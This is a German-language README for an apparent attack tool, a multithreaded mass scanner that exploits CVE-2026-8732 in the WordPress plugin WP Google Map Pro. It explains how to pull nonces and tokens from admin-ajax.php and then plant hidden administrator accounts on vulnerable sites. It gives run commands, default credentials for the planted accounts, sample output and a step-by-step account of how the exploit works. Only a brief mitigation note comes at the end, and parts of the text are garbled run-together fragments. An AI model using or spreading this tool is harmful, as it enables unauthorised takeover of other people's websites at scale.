
Mehrthread-Massenscanner für CVE-2026-8732 in WordPress WP Google Map Pro. Automatisiert Nonce-Extraktion, Token-Ausnutzung und Erstellung versteckter Administratorkonten auf angreifbaren Websites.
Dieses Tool nutzt CVE-2026-8732 aus, eine Schwachstelle im WP Google Map Pro Plugin für WordPress. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, über einen AJAX-Endpunkt (admin-ajax.php?action=wpgmp_temp_access_ajax) einen gültigen wpmp_token zu erhalten. Mit diesem Token kann ein Angreifer auf das WordPress-Admin-Panel zugreifen und einen neuen Administrator-Benutzer erstellen.
Das Tool führt einen Massen-Scan von einer Liste von Domains durch, extrahiert Nonce und Token und erstellt automatisch ein verstecktes Administrator-Konto auf verwundbaren Websites. Ergebnisse werden in Echtzeit mit vollständigen Token-Details gespeichert.
| Feld | Wert |
|---|---|
| CVE-ID | CVE-2026-8732 (hypothetisch für dieses Plugin) |
| Betroffenes Plugin | WP Google Map Pro (Versionen <= 1.5.0) |
| Verwundbarkeitstyp | Fehlerhafte Zugriffskontrolle / Privilegieneskalation |
| Angriffsvektor | Nicht authentifiziert, Remote |
| Auswirkung | Vollständige Übernahme der Website durch Erstellung eines Admin-Kontos |
admin_created.txthttp:// als auch https://requests-BibliothekInstallieren Sie die erforderliche Bibliothek:
pip install requests
🚀 Installation
git clone https://github.com/CVE-2026-8732-POC/CVE-2026-8732.git
cd CVE-2026-8732
🎯 Verwendung
Bereiten Sie eine Datei mit der Zielliste vor (eine Domain pro Zeile):
example.com
https://target-website.com
http://vulnerable-site.org
Führen Sie den Scanner aus:
python2 exploit.py targets.txt
Ausgabedateien
Dateiinhalt res.txt Verwundbare Domains mit vollständigem Token und Weiterleitungs-URL (falls vorhanden) admin_created.txt Erfolgreich erstellte Admin-Anmeldedaten (Domain, Benutzername, Passwort, E-Mail)
Beispielausgabe
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ Konfiguration
Bearbeiten Sie die folgenden Variablen im Skript:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 Funktionsweise
wpgmp_local oder fc-call-nonce aus dem HTML./wp-admin/admin-ajax.php mit action=wpgmp_temp_access_ajax und der erhaltenen Nonce./wp-admin/user-new.php zu, extrahiert _wpnonce_create-user und sendet einen POST, um einen neuen Administrator-Benutzer zu erstellen.users.php oder sucht nach dem neuen Benutzernamen in der Benutzerliste, um den Erfolg zu bestätigen.🛡️ Abhilfemaßnahmen
wpgmp_temp_access_ajax über benutzerdefinierten Code oder eine Firewall.admin-ajax.php zu blockieren.